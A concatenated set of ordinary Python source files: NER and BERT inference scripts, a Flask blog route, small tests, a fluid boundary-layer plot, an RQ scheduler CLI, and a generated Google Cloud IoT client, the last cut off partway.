|
refs/heads/master
| 2023-04-23T20:07:56.774530 | 2021-04-16T13:18:36 | 2021-04-16T13:18:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,066 |
py
|
"""Test model for SMP-CAIL2020-Argmine.
Author: Tsinghuaboy [email protected]
Usage:
python main.py --model_config 'config/bert_config.json' \
--in_file 'data/SMP-CAIL2020-test1.csv' \
--out_file 'bert-submission-test-1.csv'
python main.py --model_config 'config/rnn_config.json' \
--in_file 'data/SMP-CAIL2020-test1.csv' \
--out_file 'rnn-submission-test-1.csv'
"""
import argparse
import itertools
import json
import os
import re
from types import SimpleNamespace
import fire
import pandas as pd
import torch
from torch.utils.data import DataLoader
from data import Data
from evaluate import evaluate, handy_tool, calculate_accuracy_f1
from model import RnnForSentencePairClassification, BertYForClassification, NERNet,NERWNet
from utils import load_torch_model
LABELS = ['1', '2', '3', '4', '5']
MODEL_MAP = {
'bert': BertYForClassification,
'rnn': NERNet,
'rnnkv': NERWNet
}
all_types = ['LAK', 'OTH', 'HYD', 'ORG', 'LOC', 'RIV', 'RES', 'TER', 'DAM', 'PER']
def result_to_json(string, tags):
item = {"string": string, "entities": []}
entity_name = ""
entity_start = 0
idx = 0
i = -1
zipped = zip(string, tags)
listzip = list(zipped)
last = len(listzip)
for char, tag in listzip:
i += 1
if tag == 0:
item["entities"].append({"word": char, "start": idx, "end": idx+1, "type":'s'})
elif (tag % 3) == 1:
entity_name += char
entity_start = idx
elif (tag % 3) == 2:
type_index = (tag-1) // 3
if (entity_name != "") and (i == last):
entity_name += char
item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": all_types[type_index]})
entity_name = ""
else:
entity_name += char
elif (tag % 3)+3 == 3: # or i == len(zipped)
type_index = (tag-1) // 3
entity_name += char
item["entities"].append({"word": entity_name, "start": entity_start, "end": idx + 1, "type": all_types[type_index]})
entity_name = ""
else:
entity_name = ""
entity_start = idx
idx += 1
return item
def remove(text):
cleanr = re.compile(r"[ !#\$%&'\(\)*\+,-./:;<=>?@\^_`{|}~“”?!【】()、’‘…¥·]*")
cleantext = re.sub(cleanr, '', text)
return cleantext
def main(out_file='output/result.json',
model_config='config/rnn_config.json'):
"""Test model for given test set on 1 GPU or CPU.
Args:
in_file: file to be tested
out_file: output file
model_config: config file
"""
# 0. Load config
with open(model_config) as fin:
config = json.load(fin, object_hook=lambda d: SimpleNamespace(**d))
if torch.cuda.is_available():
device = torch.device('cuda')
# device = torch.device('cpu')
else:
device = torch.device('cpu')
#0. preprocess file
# id_list = []
# with open(in_file, 'r', encoding='utf-8') as fin:
# for line in fin:
# sents = json.loads(line.strip())
# id = sents['id']
# id_list.append(id)
# id_dict = dict(zip(range(len(id_list)), id_list))
# 1. Load data
data = Data(vocab_file=os.path.join(config.model_path, 'vocab.txt'),
max_seq_len=config.max_seq_len,
model_type=config.model_type, config=config)
test_set, sc_list, label_list = data.load_file(config.test_file_path, train=False)
token_list = []
for line in sc_list:
tokens = data.tokenizer.convert_ids_to_tokens(line)
token_list.append(tokens)
data_loader_test = DataLoader(
test_set, batch_size=config.batch_size, shuffle=False)
# 2. Load model
model = MODEL_MAP[config.model_type](config)
model = load_torch_model(
model, model_path=os.path.join(config.model_path, 'model.bin'))
model.to(device)
# 3. Evaluate
answer_list, length_list = evaluate(model, data_loader_test, device, isTest=True)
def flatten(ll):
return list(itertools.chain(*ll))
# train_answers = handy_tool(label_list, length_list) #gold
# #answer_list = handy_tool(answer_list, length_list) #prediction
# train_answers = flatten(train_answers)
# train_predictions = flatten(answer_list)
#
# train_acc, train_f1 = calculate_accuracy_f1(
# train_answers, train_predictions)
# print(train_acc, train_f1)
test_json = json.load(open(config.test_file_path, 'r', encoding='utf-8'))
id_list = [item['id'] for item in test_json]
mod_tokens_list = handy_tool(token_list, length_list)
result = [result_to_json(t, s) for t,s in zip(mod_tokens_list, answer_list)]
# 4. Write answers to file
with open(out_file, 'w', encoding='utf8') as fout:
result_list = []
for id, item in zip(id_list,result):
entities = item['entities']
words = [d['word']+"-"+d['type'] for d in entities if d['type'] !='s']
unique_words = []
for w in words:
if w not in unique_words:
unique_words.append(w)
item = {}
item['id'] = id
item['entities'] = unique_words
result_list.append(item)
json.dump(result_list,fout,ensure_ascii=False, indent=4)
#fout.write(" ".join(words) + "\n")
# para_list = pd.read_csv(temp_file)['para'].to_list()
# summary_dict = dict(zip(id_dict.values(), [""] * len(id_dict)))
#
# result = zip(para_list, token_list)
# for id, summary in result:
# summary_dict[id_dict[id]] += remove(summary).replace(" ","")
#
# with open(out_file, 'w', encoding='utf8') as fout:
# for id, sumamry in summary_dict.items():
# fout.write(json.dumps({'id':id,'summary':sumamry}, ensure_ascii=False) + '\n')
if __name__ == '__main__':
fire.Fire(main)
|
[
"[email protected]"
] | |
de94817af1da26dc86379aaeed8e0352d2b54a29
|
89d674ef6ea9f6cceb7c58dda8da524b8b2aa944
|
/flaskblog/main/routes.py
|
b2b67c9bf7673099a9f427859a670da435383448
|
[] |
no_license
|
vinodhrathanam/flashblog
|
004ceb19e8fe8611f9acf336ee210a40615a987a
|
b5ae533d36bcb64414c79adfa0e3b30e90b145bc
|
refs/heads/master
| 2020-05-09T14:32:44.173794 | 2019-04-13T16:25:32 | 2019-04-13T16:25:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 455 |
py
|
from flask import render_template, request, Blueprint
from flaskblog.models import Post
main = Blueprint('main',__name__)
@main.route('/')
@main.route('/home')
def home():
page = request.args.get('page',1,type=int)
posts = Post.query.order_by(Post.date_posted.desc()).paginate(page=page, per_page=5)
return render_template('home.html',posts=posts)
@main.route('/about')
def about():
return render_template('about.html',title='About')
|
[
"[email protected]"
] | |
d226826efc7925a38771ffa80e803b71f8684253
|
288a00d2ab34cba6c389b8c2444455aee55a8a95
|
/tests/test_overwrites.py
|
6be0434f5d59a65c73dba6e837e5662c22636de7
|
[
"BSD-2-Clause"
] |
permissive
|
JohannesBuchner/pystrict3
|
ffd77b7bbc378bd4d8f21b5c6bd69a0d64a52ddb
|
18b0dd369082422f9bf0f89c72e7acb53a49849c
|
refs/heads/master
| 2023-08-14T06:37:37.954880 | 2023-07-13T11:16:38 | 2023-07-13T11:16:38 | 268,571,175 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 406 |
py
|
import ast
from hypothesis import given
from hypothesis.strategies import text
from pystrict3lib import assert_unknown, preknown
def test_assert_unknown():
node = ast.parse("print('hello world')").body[0]
known = {}
assert_unknown("name", known, node, "filename")
def test_assert_known():
node = ast.parse("print('hello world')").body[0]
known = {}
assert_unknown("name", known, node, "filename")
|
[
"[email protected]"
] | |
d7d3b5dd82cf367f319361397028ffae52993332
|
29903a2ef2dce59ecf1c680bb7096cbe5f36a43f
|
/BL_plot.py
|
7a7ccb5918c8513bdc0801e001a99585ce4b95a4
|
[] |
no_license
|
mkindree/Python_Code
|
1af4e5e05166f3ba55052330983ef08103e30b91
|
6ae03b570085bb8c1b73fbe226806fa6914a0f38
|
refs/heads/master
| 2021-03-30T20:46:48.128659 | 2018-03-13T18:26:24 | 2018-03-13T18:26:24 | 125,081,882 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,811 |
py
|
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
#%%
# These options make the figure text match the default LaTex font
plt.rc('text', usetex=True)
plt.rc('font', **{'family': 'serif', 'serif': ['Computer Modern'], 'size': 10})
#%% Boundary Layer data from spreadsheet
y = np.array([0.57, 0.60, 0.70, 0.80, 0.90, 1.00, 1.10, 1.20, 1.30, 1.40, 1.50,
1.70, 1.90, 2.10, 2.30, 2.50, 2.70, 2.90, 3.10, 3.30, 3.50, 4.50])
delta = 2.67
U = np.array([5.1378, 5.4314, 6.1356, 6.8619, 7.4792, 8.1326, 8.6573, 9.2868,
10.0035, 10.4333, 11.2046, 12.0477, 12.9027, 13.1515, 13.6101,
13.7471, 13.8719, 13.9032, 13.9653, 13.9828, 13.9917, 14.0058])
U_rms = np.array([0.409, 0.4041, 0.3921, 0.4099, 0.3921, 0.4301, 0.4502, 0.4146,
0.4393, 0.3442, 0.4229, 0.3521, 0.2876, 0.26, 0.1927, 0.1878,
0.1731, 0.1756, 0.1641, 0.1603, 0.164, 0.1644])
U_inf = 14.01
eta = np.array([0, 0.2, 0.4, 0.6, 0.8, 1, 1.2, 1.4, 1.6, 1.8, 2, 2.2, 2.4, 2.6,
2.8, 3, 3.2, 3.4, 3.6, 3.8, 4, 4.2, 4.4, 4.6, 4.8, 5])
eta_delta = 4.9
f_prime = np.array([0, 0.06641, 0.13277, 0.19894, 0.26471, 0.32979, 0.39378,
0.45627, 0.51676, 0.57477, 0.62977, 0.68132, 0.72899,
0.77246, 0.81152, 0.84605, 0.87609, 0.90177, 0.92333,
0.94112, 0.95552, 0.96696, 0.97587, 0.98269, 0.98779,
0.99155])
#%% Boundary Layer figure
PUBdir = r'D:\EXF Paper\EXF Paper V3\figs'
save_name = 'BL'
save_path = PUBdir + '\\' + save_name + '.eps'
fig = plt.figure(figsize=(3.3, 3))
ax1 = plt.subplot(1, 1, 1)
ax1.scatter(y/delta, U/U_inf, c='k', s=20, marker='o')
ax1.plot(eta/eta_delta, f_prime, 'k')
ax2 = ax1.twinx()
ax2.scatter(y/delta, U_rms/U_inf, c='b', s=20, marker='x')
ax1.set_ylabel(r'$\displaystyle \frac{U}{U_\infty}$', color='k',
rotation='horizontal', labelpad=14)
ax1.tick_params('y', colors='k')
xy1 = (0, 0.9)
xytext1 = (0.4, 0.9)
ax1.annotate('', xy=xy1, xytext=xytext1, textcoords='data', xycoords='data',
arrowprops=dict(facecolor='k', edgecolor='k'))
ax2.set_ylabel(r'$\displaystyle \frac{\sqrt{\overline{u^2}}}{U_\infty}$',
color='b', rotation='horizontal', labelpad=14)
ax2.tick_params('y', colors='b')
xy2 = (1.75, 0.6)
xytext2 = (0.9, 0.6)
ax1.annotate('', xy=xy2, xytext=xytext2,
arrowprops=dict(facecolor='b', edgecolor='b'))
ax1.set_xlabel(r'$\displaystyle \frac{y}{\delta}$')
plt.tight_layout()
plt.savefig(save_path, bbox_inches='tight')
#%%
PUBdir = r'D:\NOVA Interview'
save_name = 'BL'
save_path = PUBdir + '\\' + save_name + '.png'
fig = plt.figure(figsize=(3.3, 3))
ax1 = plt.subplot(1, 1, 1)
ax1.plot(eta/eta_delta, f_prime, 'b', zorder=0)
ax1.scatter(y/delta, U/U_inf, c='k', s=20, marker='o')
plt.legend(['Blasius profile', 'LDV measurements'])
#ax2 = ax1.twinx()
#ax2.scatter(y/delta, U_rms/U_inf, c='b', s=20, marker='x')
ax1.set_ylabel(r'$\displaystyle \frac{U}{U_\infty}$', color='k',
rotation='horizontal', labelpad=14)
ax1.tick_params('y', colors='k')
#xy1 = (0, 0.9)
#xytext1 = (0.4, 0.9)
#ax1.annotate('', xy=xy1, xytext=xytext1, textcoords='data', xycoords='data',
# arrowprops=dict(facecolor='k', edgecolor='k'))
#ax2.set_ylabel(r'$\displaystyle \frac{\sqrt{\overline{u^2}}}{U_\infty}$',
# color='b', rotation='horizontal', labelpad=14)
#ax2.tick_params('y', colors='b')
#xy2 = (1.75, 0.6)
#xytext2 = (0.9, 0.6)
#ax1.annotate('', xy=xy2, xytext=xytext2,
# arrowprops=dict(facecolor='b', edgecolor='b'))
ax1.set_xlabel(r'$\displaystyle \frac{y}{\delta}$')
plt.tight_layout()
plt.savefig(save_path, bbox_inches='tight')
|
[
"[email protected]"
] | |
a75cf2c5ccb67a5597a9c6f2f53b6994acad99ad
|
29db1aec3519a22f01ef01a9eac783f0609dae4c
|
/Maximumposterior.py
|
dd480e3c77425e2f40fbfc99b846d6f87bd74f80
|
[] |
no_license
|
anirudhjack/Machine-Learning
|
7ebefc52cd2326c8736fc2cb0d76ae1a7f8bde37
|
c4f58a08826cb35b51ce9b0f246b6379494e64a3
|
refs/heads/master
| 2020-05-01T11:45:31.510779 | 2019-03-24T18:24:59 | 2019-03-24T18:24:59 | 177,450,960 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 860 |
py
|
import numpy as np
print(" Enter the No of training samples")
N=int(input())
x_g=np.linspace(0,2*np.pi,N)
y=np.sin(x_g)
mean=0
std=0.05
y+=np.random.normal(mean,std,N)
import matplotlib.pyplot as plt
#creating x-matrix using vstack function i.e arrange the data row wise
x=np.vstack((np.ones(N),x_g))
print("Enter the dimension:")
p=int(input())
print("Enter the value of alpha:")
alpha=float(input())
print("Enter the value of beta:")
beta=float(input())
lam=alpha/beta
print("Maximum posterior regularized lagrange multiplier:")
print(lam)
#loop for x with dimension "d"
for i in range(2,p):
x= np.vstack((x,np.power(x_g, i)))
x_p=x
#transpose of x-matrix
x=np.transpose(x)
#calculating the weight matrix
from numpy.linalg import inv
w=np.linalg.inv(x_p@x+lam*np.identity(p))@x_p@y
print("Maximum posterior weight matrix:")
print(w)
|
[
"[email protected]"
] | |
30612cf5dfad62cf5a0a6782eac0b94e52925ce5
|
26cc17706223a5f307d5b2a578620b436ce2eb69
|
/cnn/linear_model.py
|
6b8b70c74ac2649da865907d9fc859f736cc2c20
|
[] |
no_license
|
tanimutomo/webapp_mnist
|
6d3bbca2d32cd565d39e925ec200534b78bde0a1
|
7f9a8a2788b8c394aa318d5b0441b313c50a7b48
|
refs/heads/master
| 2020-03-17T07:31:40.724322 | 2019-02-11T05:30:29 | 2019-02-11T05:30:29 | 133,393,206 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 333 |
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class Linear_mnist(nn.Module):
def __init__(self):
super(Linear_mnist, self).__init__()
self.fc = nn.Linear(784, 10)
def forward(self, x):
x = x.view(-1, 28 * 28)
x = self.fc(x)
x = F.softmax(x, 1)
return x
|
[
"[email protected]"
] | |
fb94fc1597debf5a7a51e313349f8349d6bfb26d
|
0cc4eb3cb54f8394c127ace62d3108fdb5230c85
|
/.spack-env/view/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/_codecs.pyi
|
cc46a5a2b0b4513b177439dd5c53dfa3f3058b1e
|
[] |
no_license
|
jacobmerson/spack-develop-env
|
5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8
|
5fca20ca343b1a76f05fc635c87f94ed25417d94
|
refs/heads/master
| 2022-07-04T02:22:50.264727 | 2020-05-06T05:13:50 | 2020-05-06T05:13:50 | 261,657,112 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 190 |
pyi
|
/lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/py-jedi-0.17.0-zugnvpgjfmuk5x4rfhhxlsknl2g226yt/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/_codecs.pyi
|
[
"[email protected]"
] | |
db75e1888c9f05e37ce8b679dcb3e6804cadf62f
|
bef617e43198b5acd5f019f58fcef9a6b3bcf77a
|
/choreo/scheduler/scripts/rqscheduler.py
|
745b1972d9a5353c62bf9ffe794549cb68a2b982
|
[
"MIT"
] |
permissive
|
Mizzlr/choreo
|
c60dc9f39dd03a5ba3b3492bca64149bc4df177a
|
e8487b87d26640ea8826a42ef42514160decc373
|
refs/heads/master
| 2020-05-17T02:27:29.022357 | 2019-05-06T09:01:00 | 2019-05-06T09:10:17 | 183,454,970 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,752 |
py
|
#!/usr/bin/env python
import argparse
import sys
import os
from redis import Redis
from choreo.scheduler.scheduler import Scheduler
from choreo.scheduler.utils import setup_loghandlers
from choreo.multirq.cli.cli import main as multirq
@multirq.command()
def scheduler():
parser = argparse.ArgumentParser(description='Runs RQ scheduler')
parser.add_argument('-b', '--burst', action='store_true', default=False, help='Run in burst mode (quit after all work is done)')
parser.add_argument('-H', '--host', default=os.environ.get('RQ_REDIS_HOST', 'localhost'), help="Redis host")
parser.add_argument('-p', '--port', default=int(os.environ.get('RQ_REDIS_PORT', 6379)), type=int, help="Redis port number")
parser.add_argument('-d', '--db', default=int(os.environ.get('RQ_REDIS_DB', 0)), type=int, help="Redis database")
parser.add_argument('-P', '--password', default=os.environ.get('RQ_REDIS_PASSWORD'), help="Redis password")
parser.add_argument('--verbose', '-v', action='store_true', default=True, help='Show more output')
parser.add_argument('--quiet', action='store_true', default=False, help='Show less output')
parser.add_argument('--url', '-u', default=os.environ.get('RQ_REDIS_URL')
, help='URL describing Redis connection details. \
Overrides other connection arguments if supplied.')
parser.add_argument('-i', '--interval', default=5.0, type=float
, help="How often the scheduler checks for new jobs to add to the \
queue (in seconds, can be floating-point for more precision).")
parser.add_argument('--path', default='.', help='Specify the import path.')
parser.add_argument('--pid', help='A filename to use for the PID file.', metavar='FILE')
parser.add_argument('-j', '--job-class', help='Custom RQ Job class')
parser.add_argument('-q', '--queue-class', help='Custom RQ Queue class')
args = parser.parse_args(sys.argv[2:])
if args.path:
sys.path = args.path.split(':') + sys.path
if args.pid:
pid = str(os.getpid())
filename = args.pid
with open(filename, 'w') as f:
f.write(pid)
if args.url is not None:
connection = Redis.from_url(args.url)
else:
connection = Redis(args.host, args.port, args.db, args.password)
if args.verbose:
level = 'DEBUG'
elif args.quiet:
level = 'WARNING'
else:
level = 'INFO'
setup_loghandlers(level)
scheduler = Scheduler(connection=connection,
interval=args.interval,
job_class=args.job_class,
queue_class=args.queue_class)
scheduler.run(burst=args.burst)
if __name__ == '__main__':
scheduler()
|
[
"[email protected]"
] | |
e4ae7195bcb012b25bf0ef8fa2bb76dc9bcedafa
|
af5a48ef76dd701f888f3884ceb5e39aced63edf
|
/bert_predict_new.py
|
e14188b764c01f28de8bf056a27961f829ed16a1
|
[] |
no_license
|
240648795/nlp_test
|
87bae9352d741463525d1dfcc05c0f1860bb75dc
|
667b7a3a41024319aae377c00f2618d907dcd3e1
|
refs/heads/master
| 2023-02-03T23:44:26.631170 | 2020-12-16T03:08:56 | 2020-12-16T03:08:56 | 321,285,360 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,752 |
py
|
import joblib
from keras_bert import get_custom_objects
from keras.models import load_model
import numpy as np
from bert_train import acc_top2, data_generator
from keras.utils import to_categorical
import gc
import keras.backend as K
def load_model_encoder_details(model_path, encoder_path, details_path):
custom_objects = get_custom_objects()
my_objects = {'acc_top2': acc_top2}
custom_objects.update(my_objects)
model = load_model(model_path, custom_objects=custom_objects)
encoder = joblib.load(encoder_path)
nclass_dict = joblib.load(details_path)
return model, encoder, nclass_dict['nclass']
def predict_one(raw_text,model, encoder, nclass):
text = raw_text
DATA_text = []
DATA_text.append((text, to_categorical(0, nclass)))
DATA_text = np.array(DATA_text)
text = data_generator(DATA_text, shuffle=False)
test_model_pred = model.predict_generator(text.__iter__(), steps=len(text), verbose=1)
predict_num=np.argmax(test_model_pred)
predict_label=encoder.inverse_transform([predict_num])
return predict_label[0]
if __name__ == '__main__':
#必须加载模型带r
model, encoder, nclass = load_model_encoder_details(r'model\bert_model.h5',
r'model\bert_model_encoder.joblib',
r'model\bert_model_details.joblib')
# 单独评估一个本来分类
text = '支架过于单薄。导致支撑不平衡。更换新件后试车正常'
predict_label=predict_one(text,model, encoder, nclass)
print (predict_label)
del model # 删除模型减少缓存
gc.collect() # 清理内存
K.clear_session() # clear_session就是清除一个session
|
[
"[email protected]"
] | |
e1a70889e373ca860d381781148acddcf9e13a57
|
d1ddb9e9e75d42986eba239550364cff3d8f5203
|
/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/cloudiot/v1beta1/cloudiot_v1beta1_client.py
|
b2ff82c30ed6816f1ea9058a0ee4fe9536f38a48
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
bopopescu/searchparty
|
8ecd702af0d610a7ad3a8df9c4d448f76f46c450
|
afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6
|
refs/heads/master
| 2022-11-19T14:44:55.421926 | 2017-07-28T14:55:43 | 2017-07-28T14:55:43 | 282,495,798 | 0 | 0 |
Apache-2.0
| 2020-07-25T17:48:53 | 2020-07-25T17:48:52 | null |
UTF-8
|
Python
| false | false | 21,034 |
py
|
"""Generated client library for cloudiot version v1beta1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.cloudiot.v1beta1 import cloudiot_v1beta1_messages as messages
class CloudiotV1beta1(base_api.BaseApiClient):
"""Generated client library for service cloudiot version v1beta1."""
MESSAGES_MODULE = messages
BASE_URL = u'https://cloudiot.googleapis.com/'
_PACKAGE = u'cloudiot'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform', u'https://www.googleapis.com/auth/cloudiot']
_VERSION = u'v1beta1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_CLIENT_CLASS_NAME = u'CloudiotV1beta1'
_URL_VERSION = u'v1beta1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new cloudiot handle."""
url = url or self.BASE_URL
super(CloudiotV1beta1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.projects_locations_registries_devices_configVersions = self.ProjectsLocationsRegistriesDevicesConfigVersionsService(self)
self.projects_locations_registries_devices = self.ProjectsLocationsRegistriesDevicesService(self)
self.projects_locations_registries = self.ProjectsLocationsRegistriesService(self)
self.projects_locations = self.ProjectsLocationsService(self)
self.projects = self.ProjectsService(self)
class ProjectsLocationsRegistriesDevicesConfigVersionsService(base_api.BaseApiService):
"""Service class for the projects_locations_registries_devices_configVersions resource."""
_NAME = u'projects_locations_registries_devices_configVersions'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesDevicesConfigVersionsService, self).__init__(client)
self._upload_configs = {
}
def List(self, request, global_params=None):
"""Lists the last few versions of the device configuration in descending.
order (i.e.: newest first).
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesConfigVersionsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDeviceConfigVersionsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}/configVersions',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.configVersions.list',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'numVersions'],
relative_path=u'v1beta1/{+name}/configVersions',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesConfigVersionsListRequest',
response_type_name=u'ListDeviceConfigVersionsResponse',
supports_download=False,
)
class ProjectsLocationsRegistriesDevicesService(base_api.BaseApiService):
"""Service class for the projects_locations_registries_devices resource."""
_NAME = u'projects_locations_registries_devices'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesDevicesService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
"""Creates a device in a device registry.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.devices.create',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[],
relative_path=u'v1beta1/{+parent}/devices',
request_field=u'device',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesCreateRequest',
response_type_name=u'Device',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'DELETE',
method_id=u'cloudiot.projects.locations.registries.devices.delete',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesDeleteRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Gets details about a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.get',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesGetRequest',
response_type_name=u'Device',
supports_download=False,
)
def List(self, request, global_params=None):
"""List devices in a device registry.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDevicesResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.list',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[u'deviceIds', u'deviceNumIds', u'fieldMask', u'pageSize', u'pageToken'],
relative_path=u'v1beta1/{+parent}/devices',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesListRequest',
response_type_name=u'ListDevicesResponse',
supports_download=False,
)
def ModifyCloudToDeviceConfig(self, request, global_params=None):
"""Modifies the configuration for the device, which is eventually sent from.
the Cloud IoT servers. Returns the modified configuration version and its
meta-data.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesModifyCloudToDeviceConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceConfig) The response message.
"""
config = self.GetMethodConfig('ModifyCloudToDeviceConfig')
return self._RunMethod(
config, request, global_params=global_params)
ModifyCloudToDeviceConfig.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}:modifyCloudToDeviceConfig',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.devices.modifyCloudToDeviceConfig',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}:modifyCloudToDeviceConfig',
request_field=u'modifyCloudToDeviceConfigRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesModifyCloudToDeviceConfigRequest',
response_type_name=u'DeviceConfig',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'PATCH',
method_id=u'cloudiot.projects.locations.registries.devices.patch',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'updateMask'],
relative_path=u'v1beta1/{+name}',
request_field=u'device',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesPatchRequest',
response_type_name=u'Device',
supports_download=False,
)
class ProjectsLocationsRegistriesService(base_api.BaseApiService):
"""Service class for the projects_locations_registries resource."""
_NAME = u'projects_locations_registries'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
"""Creates a device registry that contains devices.
Args:
request: (CloudiotProjectsLocationsRegistriesCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.create',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[],
relative_path=u'v1beta1/{+parent}/registries',
request_field=u'deviceRegistry',
request_type_name=u'CloudiotProjectsLocationsRegistriesCreateRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
